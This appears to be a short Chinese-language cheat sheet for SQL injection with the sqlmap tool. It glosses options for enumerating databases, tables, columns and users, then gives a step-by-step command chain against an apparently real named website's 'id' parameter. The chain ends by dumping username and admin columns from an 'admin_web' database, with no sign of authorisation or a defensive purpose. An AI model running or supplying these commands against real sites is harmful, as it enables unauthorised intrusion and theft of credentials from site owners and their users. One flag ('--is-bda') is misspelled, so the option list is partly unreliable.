时间:2021-07-01 10:21:17 帮助过:17人阅读
-D:数据库
-T:表名
--tables参数:列表名(查看数据库中的表)
--columns参数:列表字段(查看表中字段)
--dump参数:下载数据
--is-bda:当前用户权限
--dbs:所有数据库
--current-db:网站当前数据库
--users:所有数据库用户
--current-user:当前数据库用户
sqlmap -u “http://www.it-tec.com.cn/col.jsp?id=103”
sqlmap -u “http://www.it-tec.com.cn/col.jsp?id=103” --tables
sqlmap -u “http://www.it-tec.com.cn/col.jsp?id=103” --tables -D "admin_web" 查看数据库
sqlmap -u “http://www.it-tec.com.cn/col.jsp?id=103”--columns -T "表名" -D "admin_web"
sqlmap -u “http://www.it-tec.com.cn/col.jsp?id=103”--dump -C "username,admin" -T "表名" -D "admin_web"
SQL注入
标签:column 间接 语句 users sqlmap table 包含 就是 .com